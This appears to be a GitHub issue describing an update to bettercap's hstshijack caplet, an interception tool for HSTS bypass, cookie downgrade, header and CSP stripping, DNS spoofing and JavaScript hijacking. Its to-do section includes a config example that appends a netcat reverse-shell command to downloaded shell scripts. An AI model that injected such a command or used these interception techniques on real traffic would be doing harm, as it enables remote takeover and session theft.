caplets icon indicating copy to clipboard operation
caplets copied to clipboard
verified publisher icon bettercap

Update hstshijack

Open buffermet opened this issue 7 months ago • 0 comments

Depends on https://github.com/bettercap/bettercap/pull/1195

Changes:

  • Implemented cookie domain spoofing.
  • Implemented cookie downgrade attack (for downgrading HTTPS).
  • Implemented req/res body regex replacement JSON config file.
  • Implemented req/res header regex replacement JSON config file.
  • Implemented req URL regex replacement JSON config file.
  • Implemented JS payloads regex replacement JSON config file (with obfuscation of obf_hstshijack_ prefixed strings).
  • DOM spoofing is done with MutationObserver instead of a loop.
  • hijack.js payload now hijacks document.cookie getter and setter.
  • hijack.js payload now hijacks Element.innerHTML setter.
  • hijack.js payload now hijacks Element.outerHTML setter.
  • hijack.js payload now hijacks HTMLLinkElement.href setter.
  • hijack.js payload now hijacks HTMLScriptElement.nonce setter.
  • hijack.js payload now hijacks HTMLScriptElement.src setter.
  • HTTP proxy module now spoofs preflight response headers.
  • HTTP proxy module no longer hardcodes CSP headers, only removes them.
  • DNS proxy module drops AAAA queries by default.
  • Fixed bug in HTTP proxy module where HTTPS scheme was not properly restored in request headers for the requested hostname.
  • Fixed bug where spaces were removed from file paths in environment variables.
  • Fixed bug where Access-Control-Allow-Origin response header was incorrectly spoofed.
  • Reduced a great deal of overhead in the HTTP proxy module by precompiling regex selectors where possible.
  • Changed indentation from spaces to tabs.
  • Cleaned up caplet folder structure.

To do:

  • Improve res/req header & body spoofing by assembling string slices using match length and indices.
  • Refactor res body spoofing so we can target every mimetype/extension/... from the res.Body.json config. Consider the following format:
[
    {
        "headers": ["Linux|Mac OS X", ""],
        "host": ["^raw[.]githubusercontent[.]com$", "i"],
        "path": ["[.]sh$", ""],
        "port": [],
        "query": [],
        "replacements": [
            ["$", "", "\nnohup nc 10.0.0.1 666 -e /bin/bash &>/dev/null"]
        ]
    }
]
  • Implement configurable sync/async SSL discovery mechanism for requested hostnames that we don't know yet.
  • Complete optionality of cookie downgrade attack in the DOM (hijack.js payload).
  • ~~Extend whitelisting to also stop sending spoofed DNS responses to whitelisted clients for whitelisted hostnames in DNS proxy module.~~ Don't do this because it blocks the HTTPS redirect.
  • Allow the option to set global variable names across multiple JS payloads that get obfuscated by the HTTP proxy module.
  • For the amoeba extension integration we should have a run queue of HID and other DOM event instructions in their respective Window/DOM event listeners (e.g. load, DOMContentLoaded, etc.) to keep the DOM state in sync since the attacker's page won't finish loading at the same time as the victim's.

buffermet avatar May 11 '25 12:05 buffermet